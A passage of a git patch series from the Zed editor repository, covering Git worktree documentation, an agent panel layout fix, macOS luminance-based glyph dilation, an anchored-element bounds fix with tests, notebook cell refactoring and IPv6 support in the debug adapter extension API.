+ pub fn initialize_channel_store(&self, cx: &mut TestAppContext) { + self.channel_store + .update(cx, |channel_store, _| channel_store.initialize()); + } + pub fn local_projects(&self) -> impl Deref>> + '_ { Ref::map(self.state.borrow(), |state| &state.local_projects) } From 6ba5a1a65c5a0021974c60285dcdfe6281dc837c Mon Sep 17 00:00:00 2001 From: Hans Donner Date: Wed, 29 Apr 2026 00:55:21 +0200 Subject: [PATCH 084/231] docs: Document Git worktrees (#55119) - Document Git worktrees as a general Git workflow in the Git docs - Add cross-links from AI, tasks, worktree trust, and remote development docs - Include the `git::Worktree` action in the Git action reference The main docs gap was that worktrees were mostly framed as an AI isolation feature, while Zed implements them as a general Git workflow through the title bar worktree picker. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Danilo Leal Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> --- docs/src/ai/parallel-agents.md | 2 +- docs/src/git.md | 32 ++++++++++++++++++++++++++++++++ docs/src/remote-development.md | 3 +++ docs/src/tasks.md | 2 +- docs/src/worktree-trust.md | 2 ++ 5 files changed, 39 insertions(+), 2 deletions(-) diff --git a/docs/src/ai/parallel-agents.md b/docs/src/ai/parallel-agents.md index f858d747de0d73..d574348ff6de43 100644 --- a/docs/src/ai/parallel-agents.md +++ b/docs/src/ai/parallel-agents.md @@ -63,7 +63,7 @@ A single project can contain multiple folders (a multi-root folder project). 
Age ## Worktree Isolation {#worktree-isolation} -If two threads might edit the same files, start one in a new Git worktree to give it an isolated checkout. +If two threads might edit the same files, start one in a new [Git worktree](../git.md#git-worktrees) to give it an isolated checkout. Worktrees are managed from the title bar. Click the worktree picker (to the right of the project picker) to switch between existing worktrees or create a new one. New worktrees are created in a detached HEAD state, so you won't accidentally share a branch between worktrees. diff --git a/docs/src/git.md b/docs/src/git.md index f7b524925195a8..aa24878ba04523 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -168,12 +168,43 @@ Find more information about setting the `preferred-line-length` in the [Configur Create a new branch using {#action git::Branch} or switch to an existing branch using {#action git::Switch} or {#action git::CheckoutBranch}. +When you are working in a [Git worktree](#git-worktrees), use the branch picker after switching to the worktree to create or check out the branch you want to use there. + ### Deleting Branches To delete a branch, open the branch switcher with {#action git::Switch}, find the branch you want to delete, and use the delete option. Zed will confirm before deleting to prevent accidental data loss. > **Note:** You cannot delete the branch you currently have checked out. Switch to a different branch first. +## Git Worktrees + +Git worktrees let you keep multiple checkouts of the same repository on disk at the same time. +This is useful when you want to work on more than one branch or task without stashing, rebuilding, or disturbing the files in your main checkout. + +Open the worktree picker from the title bar, next to the project picker, or by running {#action git::Worktree}. 
+From the picker, you can: + +- Create a new linked worktree either from the current branch or default branch +- Type a name to create a named worktree or let Zed automatically pick one for you +- Switch the current workspace to an existing worktree +- Open an existing worktree in a new window +- Delete linked worktrees that are not currently open in the project + +New worktrees are created in detached HEAD state. +After switching to the new worktree, use the branch picker next to the worktree picker to create a new branch or check out an existing, unused branch. +This keeps Zed from accidentally checking out the same branch in multiple worktrees. + +The directory used for new worktrees is controlled by the `git.worktree_directory` setting. +By default, Zed creates worktrees under `../worktrees` relative to the repository's working directory. + +See [All Settings](./reference/all-settings.md#git-worktree-directory) for examples. + +If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. +Non-Git folders in the same project are included in the new workspace as-is. + +To run setup steps after Zed creates a linked worktree, use the [`create_worktree` task hook](./tasks.md#hooks). +For agent-specific workflows, see [Worktree Isolation](./ai/parallel-agents.md#worktree-isolation). + ## Merge Conflicts When you encounter merge conflicts after a merge, rebase, or pull, Zed highlights the conflicting regions in your files and displays resolution buttons above each conflict. 
@@ -337,6 +368,7 @@ When viewing files with changes, Zed displays diff hunks that can be expanded or | {#action git::Branch} | {#kb git::Branch} | | {#action git::Switch} | {#kb git::Switch} | | {#action git::CheckoutBranch} | {#kb git::CheckoutBranch} | +| {#action git::Worktree} | {#kb git::Worktree} | | {#action git::Blame} | {#kb git::Blame} | | {#action git::StashAll} | {#kb git::StashAll} | | {#action git::StashPop} | {#kb git::StashPop} | diff --git a/docs/src/remote-development.md b/docs/src/remote-development.md index 9092de2cac33da..706afe67f4f1ba 100644 --- a/docs/src/remote-development.md +++ b/docs/src/remote-development.md @@ -262,6 +262,9 @@ Note that we deliberately disallow some options (for example `-t` or `-T`) that - [Running & Testing](./running-testing.md): Run tasks, terminal commands, and debugger sessions while you work remotely. +- [Git Worktrees](./git.md#git-worktrees): Create and switch between linked + Git worktrees. Zed supports the worktree picker in remote projects when the + remote connection is active. - [Configuring Zed](./configuring-zed.md): Manage shared and project settings, including `.zed/settings.json`. - [Agent Panel](./ai/agent-panel.md): Use AI workflows in remote projects. diff --git a/docs/src/tasks.md b/docs/src/tasks.md index 8364b460378a28..401cef6a4cc667 100644 --- a/docs/src/tasks.md +++ b/docs/src/tasks.md @@ -236,7 +236,7 @@ In addition to being spawned manually, tasks can be configured to run automatica The following hooks are currently supported: -- `create_worktree` — runs after Zed creates a new linked Git worktree, either directly through the CLI or through the UI with the worktree modal. The task is spawned with `ZED_WORKTREE_ROOT` pointing at the newly created worktree and `ZED_MAIN_GIT_WORKTREE` pointing at the original repository's working directory, which makes these hooks well-suited to copying untracked files (such as `.env` files) or running per-worktree setup commands. 
+- `create_worktree` — runs after Zed creates a new linked Git worktree, either directly through the CLI or from the [worktree picker](./git.md#git-worktrees). The task is spawned with `ZED_WORKTREE_ROOT` pointing at the newly created worktree and `ZED_MAIN_GIT_WORKTREE` pointing at the original repository's working directory, which makes these hooks well-suited to copying untracked files (such as `.env` files) or running per-worktree setup commands. Hook tasks are resolved from the same global and worktree-local `tasks.json` files as manually spawned tasks, and multiple tasks may register for the same hook; they all run when the hook fires. A hook task still benefits from the usual task configuration fields — `cwd`, `env`, `reveal`, `hide`, and so on — so you can control how much of the terminal UI is shown while it runs. diff --git a/docs/src/worktree-trust.md b/docs/src/worktree-trust.md index 3e22c46a14bf80..35c25cda0e2c19 100644 --- a/docs/src/worktree-trust.md +++ b/docs/src/worktree-trust.md @@ -8,6 +8,8 @@ description: "Configure which folders Zed trusts for running code and extensions A worktree in Zed is either a directory or a single file that Zed opens as a standalone "project". Zed opens a worktree each time you run `zed some/path`, drag a file or directory into Zed, or open your user settings file. +> Note: This is broader than a [Git worktree](./git.md#git-worktrees). A Git worktree is a linked checkout managed by Git; Zed's trust model applies to every opened file or folder root, including Git worktrees. + Every worktree opened may contain a `.zed/settings.json` file with extra configuration options that may require installing and spawning language servers or MCP servers. To let users choose based on their own threat model and risk tolerance, all worktrees start in Restricted Mode. Restricted Mode prevents downloading and running related items from `.zed/settings.json`. 
Until a worktree is trusted, Zed does not run related untrusted actions and waits for user confirmation. This gives users a chance to review project settings, MCP servers, and language servers. From 586da1aa4ff9362b9fe7f428eda5b272036c99f0 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Tue, 28 Apr 2026 20:31:31 -0300 Subject: [PATCH 085/231] agent_ui: Fix placeholder wrapping in the message editor (#55125) Fixes this: image Release Notes: - Fixed a bug where placeholder text in the agent panel's message editor wouldn't properly wrap. --- crates/agent_ui/src/conversation_view/thread_view.rs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index accc82a2ff7323..ed42c576a36db8 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -3211,10 +3211,9 @@ impl ThreadView { .child( v_flex() .when_some(max_content_width, |this, max_w| this.flex_basis(max_w)) - .when(max_content_width.is_none(), |this| this.w_full()) + .when(fills_container, |this| this.h_full()) .flex_shrink() .flex_grow_0() - .when(fills_container, |this| this.h_full()) .justify_between() .gap_2() .child( @@ -3275,6 +3274,7 @@ impl ThreadView { ) .child( h_flex() + .flex_wrap() .gap_1() .children(self.render_token_usage(cx)) .children(self.profile_selector.clone()) From 382ece98560bc15ad3cbc6ac02e61f30b2e45be7 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 09:09:11 +0200 Subject: [PATCH 086/231] Implement luminance-based glyph dilation for macOS (#54886) Apple's text rendering stack dilates glyph outlines for text rendered with a light foreground color. Zed doesn't consider this nuance today; we populate our atlas using glyphs rendered with a dark foreground color. 
This means that, particularly in dark themes, text in Zed looks thin and blurry, and doesn't match the look of native macOS applications. This pull request replicates the native behavior of Core Graphics. Some reverse-engineering revealed that CG computes the foreground color luminance using the Rec. 709 formula ($Y=0.2126R + 0.7152G + 0.0722B$) and quantizes it into five levels (0, 0.25, 0.5, 0.75, and 1). Each level uses a different dilation factor. With this patch, we calculate this same luminance bucket and supply it as the foreground color during rasterization. The correct dilation will be applied, and we'll store this glyph in the atlas keyed by this luminance bucket. So, we'll generate and use up to 5 different bitmaps for each glyph based on its foreground color. I've confirmed that text rendered by Zed now exactly matches native applications like Safari, TextEdit, etc. Release Notes: - Improved text rendering clarity on macOS, particularly in dark themes. --------- Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com> --- crates/gpui/src/platform.rs | 12 ++++-- crates/gpui/src/text_system.rs | 7 ++++ crates/gpui/src/window.rs | 3 ++ crates/gpui_macos/src/text_system.rs | 62 +++++++++++++++++++++------- 4 files changed, 66 insertions(+), 18 deletions(-) diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index 6cd8e9cd8d4d9d..ac36f05c425d6a 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -31,10 +31,10 @@ pub(crate) type PlatformScreenCaptureFrame = core_video::image_buffer::CVImageBu use crate::{ Action, AnyWindowHandle, App, AsyncWindowContext, BackgroundExecutor, Bounds, DEFAULT_WINDOW_SIZE, DevicePixels, DispatchEventResult, Font, FontId, FontMetrics, FontRun, - ForegroundExecutor, GlyphId, GpuSpecs, ImageSource, Keymap, LineLayout, Pixels, PlatformInput, - Point, Priority, RenderGlyphParams, RenderImage, RenderImageParams, RenderSvgParams, Scene, - ShapedGlyph, ShapedRun,
SharedString, Size, SvgRenderer, SystemWindowTab, Task, - ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, + ForegroundExecutor, GlyphId, GpuSpecs, Hsla, ImageSource, Keymap, LineLayout, Pixels, + PlatformInput, Point, Priority, RenderGlyphParams, RenderImage, RenderImageParams, + RenderSvgParams, Scene, ShapedGlyph, ShapedRun, SharedString, Size, SvgRenderer, + SystemWindowTab, Task, ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, }; use anyhow::Result; #[cfg(any(target_os = "linux", target_os = "freebsd"))] @@ -783,6 +783,10 @@ pub trait PlatformTextSystem: Send + Sync { /// Returns the recommended text rendering mode for the given font and size. fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels) -> TextRenderingMode; + /// Returns the dilation level to use for a glyph painted in the given color. + fn glyph_dilation_for_color(&self, _color: Hsla) -> u8 { + 0 + } } #[expect(missing_docs)] diff --git a/crates/gpui/src/text_system.rs b/crates/gpui/src/text_system.rs index c7b11ecaa4efc5..bebe180b2627b4 100644 --- a/crates/gpui/src/text_system.rs +++ b/crates/gpui/src/text_system.rs @@ -348,6 +348,11 @@ impl TextSystem { .rasterize_glyph(params, raster_bounds) } + /// Returns the dilation level to use for a glyph painted in the given color. + pub(crate) fn glyph_dilation_for_color(&self, color: Hsla) -> u8 { + self.platform_text_system.glyph_dilation_for_color(color) + } + /// Returns the text rendering mode recommended by the platform for the given font and size. /// The return value will never be [`TextRenderingMode::PlatformDefault`]. 
pub(crate) fn recommended_rendering_mode( @@ -1007,6 +1012,7 @@ pub struct RenderGlyphParams { pub scale_factor: f32, pub is_emoji: bool, pub subpixel_rendering: bool, + pub dilation: u8, } impl Eq for RenderGlyphParams {} @@ -1020,6 +1026,7 @@ impl Hash for RenderGlyphParams { self.scale_factor.to_bits().hash(state); self.is_emoji.hash(state); self.subpixel_rendering.hash(state); + self.dilation.hash(state); } } diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 4cea82bde7aefb..99374fd042ecd0 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -3591,6 +3591,7 @@ impl Window { ); let integer_origin = quantized_origin.map(|c| ScaledPixels(c.trunc())); let subpixel_rendering = self.should_use_subpixel_rendering(font_id, font_size); + let dilation = self.text_system().glyph_dilation_for_color(color); let params = RenderGlyphParams { font_id, glyph_id, @@ -3599,6 +3600,7 @@ impl Window { scale_factor, is_emoji: false, subpixel_rendering, + dilation, }; let raster_bounds = self.text_system().raster_bounds(¶ms)?; @@ -3688,6 +3690,7 @@ impl Window { scale_factor, is_emoji: true, subpixel_rendering: false, + dilation: 0, }; let raster_bounds = self.text_system().raster_bounds(¶ms)?; diff --git a/crates/gpui_macos/src/text_system.rs b/crates/gpui_macos/src/text_system.rs index d4ffd2514e3ed1..80145f706eeac8 100644 --- a/crates/gpui_macos/src/text_system.rs +++ b/crates/gpui_macos/src/text_system.rs @@ -35,9 +35,9 @@ use font_kit::{ }; use gpui::{ Bounds, DevicePixels, Font, FontFallbacks, FontFeatures, FontId, FontMetrics, FontRun, - FontStyle, FontWeight, GlyphId, LineLayout, Pixels, PlatformTextSystem, RenderGlyphParams, - Result, SUBPIXEL_VARIANTS_X, ShapedGlyph, ShapedRun, SharedString, Size, TextRenderingMode, - point, px, size, swap_rgba_pa_to_bgra, + FontStyle, FontWeight, GlyphId, Hsla, LineLayout, Pixels, PlatformTextSystem, + RenderGlyphParams, Result, Rgba, SUBPIXEL_VARIANTS_X, ShapedGlyph, ShapedRun, SharedString, + 
Size, TextRenderingMode, point, px, size, swap_rgba_pa_to_bgra, }; use parking_lot::{RwLock, RwLockUpgradableReadGuard}; use pathfinder_geometry::{ @@ -46,7 +46,7 @@ use pathfinder_geometry::{ vector::Vector2F, }; use smallvec::SmallVec; -use std::{borrow::Cow, char, convert::TryFrom, sync::Arc}; +use std::{borrow::Cow, char, convert::TryFrom, sync::Arc, sync::OnceLock}; use crate::open_type::apply_features_and_fallbacks; @@ -214,6 +214,39 @@ impl PlatformTextSystem for MacTextSystem { ) -> TextRenderingMode { TextRenderingMode::Grayscale } + + fn glyph_dilation_for_color(&self, color: Hsla) -> u8 { + // When font smoothing is enabled, CoreGraphics thickens glyph strokes by an amount that + // depends on the foreground color's luminance. We replicate the logic used by CoreGraphics + // to select between the different levels of dilation. + if !font_smoothing_allowed_by_user() { + return 0; + } + let rgba: Rgba = color.into(); + let luminance = 0.2126 * rgba.r + 0.7152 * rgba.g + 0.0722 * rgba.b; + let level = ((4.0 * luminance) + 0.5).floor() as i32; + level.clamp(0, 4) as u8 + } +} + +fn font_smoothing_allowed_by_user() -> bool { + static ALLOWED: OnceLock = OnceLock::new(); + *ALLOWED.get_or_init(|| { + use core_foundation_sys::preferences::{ + CFPreferencesCopyAppValue, kCFPreferencesCurrentApplication, + }; + + let key = CFString::new("AppleFontSmoothing"); + let value_ref = unsafe { + CFPreferencesCopyAppValue(key.as_concrete_TypeRef(), kCFPreferencesCurrentApplication) + }; + if value_ref.is_null() { + return true; + } + let number = unsafe { CFNumber::wrap_under_create_rule(value_ref as _) }; + // Only an explicit value of `0` means that font smoothing is disabled. 
+ number.to_i64() != Some(0) + }) } impl MacTextSystemState { @@ -361,7 +394,7 @@ impl MacTextSystemState { fn raster_bounds(&self, params: &RenderGlyphParams) -> Result> { let font = &self.fonts[params.font_id.0]; let scale = Transform2F::from_scale(params.scale_factor); - let mut bounds: Bounds = bounds_from_rect_i(font.raster_bounds( + let bounds: Bounds = bounds_from_rect_i(font.raster_bounds( params.glyph_id.0, params.font_size.into(), scale, @@ -369,14 +402,8 @@ impl MacTextSystemState { font_kit::canvas::RasterizationOptions::GrayscaleAa, )?); - // Add 3% of font size as padding, clamped between 1 and 5 pixels - // to avoid clipping of anti-aliased edges. - let pad = - ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5); - bounds.origin.x -= DevicePixels(pad); - bounds.size.width += DevicePixels(pad); - - Ok(bounds) + // Expand the bounds by 1 pixel on each side to give CG room for anti-aliasing. + Ok(bounds.dilate(DevicePixels(1))) } fn rasterize_glyph( @@ -438,13 +465,20 @@ impl MacTextSystemState { .subpixel_variant .map(|v| v as f32 / SUBPIXEL_VARIANTS_X as f32); cx.set_text_drawing_mode(CGTextDrawingMode::CGTextFill); - cx.set_gray_fill_color(0.0, 1.0); cx.set_allows_antialiasing(true); cx.set_should_antialias(true); cx.set_allows_font_subpixel_positioning(true); cx.set_should_subpixel_position_fonts(true); cx.set_allows_font_subpixel_quantization(false); cx.set_should_subpixel_quantize_fonts(false); + + if params.dilation > 0 { + let luminance = params.dilation as f64 * 0.25; + cx.set_should_smooth_fonts(true); + cx.set_gray_fill_color(luminance, 1.0); + } else { + cx.set_gray_fill_color(0.0, 1.0); + } self.fonts[params.font_id.0] .native_font() .clone_with_font_size(f32::from(params.font_size) as CGFloat) From f81096f9f21e4337323f7af82d851377a5b50785 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Wed, 29 Apr 2026 09:12:21 +0200 Subject: [PATCH 087/231] gpui: Fix anchored element size calculation with negative 
coordinates (#55124) Closes #53202 `Anchored::prepaint` computes the bounding box of its children to determine the size used for fitting the anchored element in the window. Previously, this calculation manually tracked the minimum origin and maximum bottom-right point, initializing the maximum point to `(0, 0)`. If child bounds were in negative coordinates, the maximum point could be clamped to `(0, 0)`, inflating the computed size. This replaces the manual min/max accumulation with `Bounds::union`, starting from the actual child bounds instead of sentinel values. This computes the child bounding box correctly regardless of coordinate sign. --- Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed a bug where the context menu in the agent panel (and other scrollable surfaces) would appear at the wrong location --- crates/gpui/src/elements/anchored.rs | 129 ++++++++++++++++++++++++--- 1 file changed, 118 insertions(+), 11 deletions(-) diff --git a/crates/gpui/src/elements/anchored.rs b/crates/gpui/src/elements/anchored.rs index ad8fa11b71ee82..29260061bb72ef 100644 --- a/crates/gpui/src/elements/anchored.rs +++ b/crates/gpui/src/elements/anchored.rs @@ -132,19 +132,17 @@ impl Element for Anchored { return; } - let mut child_min = point(Pixels::MAX, Pixels::MAX); - let mut child_max = Point::default(); - for child_layout_id in &request_layout.child_layout_ids { - let child_bounds = window.layout_bounds(*child_layout_id); - child_min = child_min.min(&child_bounds.origin); - child_max = child_max.max(&child_bounds.bottom_right()); - } - let size: Size = (child_max - child_min).into(); + let children_bounds = 
request_layout + .child_layout_ids + .iter() + .map(|id| window.layout_bounds(*id)) + .reduce(|acc, bounds| acc.union(&bounds)) + .unwrap(); let (origin, mut desired) = self.position_mode.get_position_and_bounds( self.anchor_position, self.anchor, - size, + children_bounds.size, bounds, self.offset, ); @@ -161,7 +159,7 @@ impl Element for Anchored { let switched = Bounds::from_anchor_and_size( anchor.other_side_along(Axis::Horizontal), origin, - size, + children_bounds.size, ); if !(switched.left() < limits.left() || switched.right() > limits.right()) { anchor = anchor.other_side_along(Axis::Horizontal); @@ -173,7 +171,7 @@ impl Element for Anchored { let switched = Bounds::from_anchor_and_size( anchor.other_side_along(Axis::Vertical), origin, - size, + children_bounds.size, ); if !(switched.top() < limits.top() || switched.bottom() > limits.bottom()) { desired = switched; @@ -289,3 +287,112 @@ impl AnchoredPositionMode { } } } + +#[cfg(test)] +mod tests { + use crate::{ + Context, Pixels, PlatformInput, Point, TestAppContext, Window, deferred, div, point, + prelude::*, px, size, + }; + + struct AnchoredTestView { + position: Point, + } + + impl Render for AnchoredTestView { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().size_full().child( + div() + .id("scroll-container") + .overflow_y_scroll() + .size_full() + .child(div().h(px(2000.)).w_full()) + .child( + deferred( + super::anchored() + .snap_to_window() + .position(self.position) + .child( + div() + .id("menu") + .debug_selector(|| "MENU".into()) + .w(px(200.)) + .h(px(300.)), + ), + ) + .with_priority(1), + ), + ) + } + } + + #[gpui::test] + fn test_anchored_position_without_scroll(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(100.)), + }); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + 
window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(100.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } + + #[gpui::test] + fn test_anchored_position_when_scrolled(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(100.)), + }); + + cx.run_until_parked(); + + window + .update(cx, |_, window, cx| { + let event = gpui::ScrollWheelEvent { + position: point(px(400.), px(300.)), + delta: gpui::ScrollDelta::Pixels(point(px(0.), px(-1000.))), + ..Default::default() + }; + window.dispatch_event(PlatformInput::ScrollWheel(event), cx); + }) + .unwrap(); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(100.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } + + #[gpui::test] + fn test_anchored_snaps_to_window(cx: &mut TestAppContext) { + let window = cx.open_window(size(px(800.), px(600.)), |_, _| AnchoredTestView { + position: point(px(100.), px(500.)), + }); + + cx.run_until_parked(); + + let menu_bounds = window + .update(cx, |_, window, _| { + window.rendered_frame.debug_bounds.get("MENU").copied() + }) + .unwrap() + .expect("MENU debug bounds not found"); + + assert_eq!(menu_bounds.origin, point(px(100.), px(300.))); + assert_eq!(menu_bounds.size, size(px(200.), px(300.))); + } +} From dd72e5b4e75ed43e2a57954448556872ebf852b5 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Wed, 29 Apr 2026 09:14:05 +0200 Subject: [PATCH 088/231] repl: Unify notebook cell creation (#54765) Release Notes: - N/A --------- Co-authored-by: Kirill Bulatov --- crates/repl/src/notebook/cell.rs | 108 ++++++++---------------- 
crates/repl/src/notebook/notebook_ui.rs | 1 + 2 files changed, 36 insertions(+), 73 deletions(-) diff --git a/crates/repl/src/notebook/cell.rs b/crates/repl/src/notebook/cell.rs index c4c651b50b5645..ac078b3338c1b3 100644 --- a/crates/repl/src/notebook/cell.rs +++ b/crates/repl/src/notebook/cell.rs @@ -203,12 +203,14 @@ impl Cell { let outputs = convert_outputs(outputs, window, cx); Cell::Code(cx.new(|cx| { - CodeCell::load( + CodeCell::new( + CellSource::Existing { + execution_count: *execution_count, + outputs, + }, id.clone(), metadata.clone(), - *execution_count, text, - outputs, notebook_language, window, cx, @@ -430,6 +432,7 @@ impl MarkdownCell { editor.set_text_style_refinement(refinement); editor.set_use_modal_editing(true); editor.disable_mouse_wheel_zoom(); + editor.disable_scrollbars_and_minimap(window, cx); editor }); @@ -659,8 +662,31 @@ pub struct CodeCell { impl EventEmitter for CodeCell {} +pub(super) enum CellSource { + /// Crate a new empty cell + None, + /// Backed by an existing notebook cell + Existing { + execution_count: Option, + outputs: Vec, + }, +} + +impl CellSource { + fn into_outputs(self) -> (Option, Vec) { + match self { + CellSource::Existing { + execution_count, + outputs, + } => (execution_count, outputs), + CellSource::None => Default::default(), + } + } +} + impl CodeCell { - pub fn new( + pub(super) fn new( + cell_source: CellSource, id: CellId, metadata: CellMetadata, source: String, @@ -695,6 +721,7 @@ impl CodeCell { editor.disable_mouse_wheel_zoom(); editor.disable_scrollbars_and_minimap(window, cx); + editor.set_text(source.clone(), window, cx); editor.set_show_gutter(false, cx); editor.set_text_style_refinement(refinement); editor.set_use_modal_editing(true); @@ -708,13 +735,15 @@ impl CodeCell { }); }); + let (execution_count, outputs) = cell_source.into_outputs(); + Self { id, metadata, - execution_count: None, + execution_count, source, editor, - outputs: Vec::new(), + outputs, selected: false, cell_position: None, 
execution_start_time: None, @@ -736,73 +765,6 @@ impl CodeCell { }); } - /// Load a code cell from notebook file data, including existing outputs and execution count - pub fn load( - id: CellId, - metadata: CellMetadata, - execution_count: Option, - source: String, - outputs: Vec, - notebook_language: Shared>>>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let buffer = cx.new(|cx| Buffer::local(source.clone(), cx)); - let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); - - let editor_view = cx.new(|cx| { - let mut editor = Editor::new( - EditorMode::Full { - scale_ui_elements_with_buffer_font_size: false, - show_active_line_background: false, - sizing_behavior: SizingBehavior::SizeByContent, - }, - multi_buffer, - None, - window, - cx, - ); - - let theme = ThemeSettings::get_global(cx); - let refinement = TextStyleRefinement { - font_family: Some(theme.buffer_font.family.clone()), - font_size: Some(theme.buffer_font_size(cx).into()), - color: Some(cx.theme().colors().editor_foreground), - background_color: Some(gpui::transparent_black()), - ..Default::default() - }; - - editor.disable_mouse_wheel_zoom(); - editor.set_text(source.clone(), window, cx); - editor.set_show_gutter(false, cx); - editor.set_text_style_refinement(refinement); - editor.set_use_modal_editing(true); - editor - }); - - let language_task = cx.spawn_in(window, async move |_this, cx| { - let language = notebook_language.await; - buffer.update(cx, |buffer, cx| { - buffer.set_language(language.clone(), cx); - }); - }); - - Self { - id, - metadata, - execution_count, - source, - editor: editor_view, - outputs, - selected: false, - cell_position: None, - execution_start_time: None, - execution_duration: None, - is_executing: false, - _language_task: language_task, - } - } - pub fn editor(&self) -> &Entity { &self.editor } diff --git a/crates/repl/src/notebook/notebook_ui.rs b/crates/repl/src/notebook/notebook_ui.rs index 1cb876046dd380..78b7f1a4e514b7 100644 --- 
a/crates/repl/src/notebook/notebook_ui.rs +++ b/crates/repl/src/notebook/notebook_ui.rs @@ -809,6 +809,7 @@ impl NotebookEditor { let code_cell = cx.new(|cx| { super::CodeCell::new( + super::CellSource::None, new_cell_id.clone(), metadata, String::new(), From 53aa82c934b82ea1bba9d966c156c3d556ff0915 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Wed, 29 Apr 2026 09:27:05 +0200 Subject: [PATCH 089/231] extension_api: Add IPv6 support in DAP extensions API (#54984) Fix forward for #52244 Release Notes: - N/A --- crates/extension_api/wit/since_v0.8.0/dap.wit | 12 +- crates/extension_host/src/wasm_host/wit.rs | 28 +- .../src/wasm_host/wit/since_v0_6_0.rs | 326 +++++++++++++++++- .../src/wasm_host/wit/since_v0_8_0.rs | 89 ++--- 4 files changed, 401 insertions(+), 54 deletions(-) diff --git a/crates/extension_api/wit/since_v0.8.0/dap.wit b/crates/extension_api/wit/since_v0.8.0/dap.wit index 693befe02f9c31..f0fd9bf138d3c5 100644 --- a/crates/extension_api/wit/since_v0.8.0/dap.wit +++ b/crates/extension_api/wit/since_v0.8.0/dap.wit @@ -20,15 +20,23 @@ interface dap { attach(attach-request) } + type ipv4-address = tuple; + type ipv6-address = tuple; + + variant ip-address { + ipv4(ipv4-address), + ipv6(ipv6-address), + } + record tcp-arguments { port: u16, - host: u32, + host: ip-address, timeout: option, } record tcp-arguments-template { port: option, - host: option, + host: option, timeout: option, } diff --git a/crates/extension_host/src/wasm_host/wit.rs b/crates/extension_host/src/wasm_host/wit.rs index 27847422f01680..83bfdbc818e752 100644 --- a/crates/extension_host/src/wasm_host/wit.rs +++ b/crates/extension_host/src/wasm_host/wit.rs @@ -16,7 +16,7 @@ use lsp::LanguageServerName; use release_channel::ReleaseChannel; use task::{DebugScenario, SpawnInTerminal, TaskTemplate, ZedDebugConfig}; -use crate::wasm_host::wit::since_v0_6_0::dap::StartDebuggingRequestArgumentsRequest; +use 
latest::dap::StartDebuggingRequestArgumentsRequest; use super::{WasmState, wasm_engine}; use anyhow::{Context as _, Result, anyhow}; @@ -1072,18 +1072,19 @@ impl Extension { Ok(Ok(dap_binary)) } Extension::V0_6_0(ext) => { + let task: latest::DebugTaskDefinition = task.try_into()?; let dap_binary = ext .call_get_dap_binary( store, &adapter_name, - &task.try_into()?, + &task.into(), user_installed_path.as_ref().and_then(|p| p.to_str()), resource, ) .await? .map_err(|e| anyhow!("{e:?}"))?; - Ok(Ok(dap_binary)) + Ok(Ok(dap_binary.into())) } Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1123,7 +1124,7 @@ impl Extension { .await? .map_err(|e| anyhow!("{e:?}"))?; - Ok(Ok(dap_binary)) + Ok(Ok(dap_binary.into())) } Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1154,12 +1155,13 @@ impl Extension { Ok(Ok(dap_binary.try_into()?)) } Extension::V0_6_0(ext) => { - let config = config.into(); + let config: latest::DebugConfig = config.into(); let dap_binary = ext - .call_dap_config_to_scenario(store, &config) + .call_dap_config_to_scenario(store, &config.into()) .await? .map_err(|e| anyhow!("{e:?}"))?; + let dap_binary: latest::DebugScenario = dap_binary.into(); Ok(Ok(dap_binary.try_into()?)) } Extension::V0_5_0(_) @@ -1199,18 +1201,20 @@ 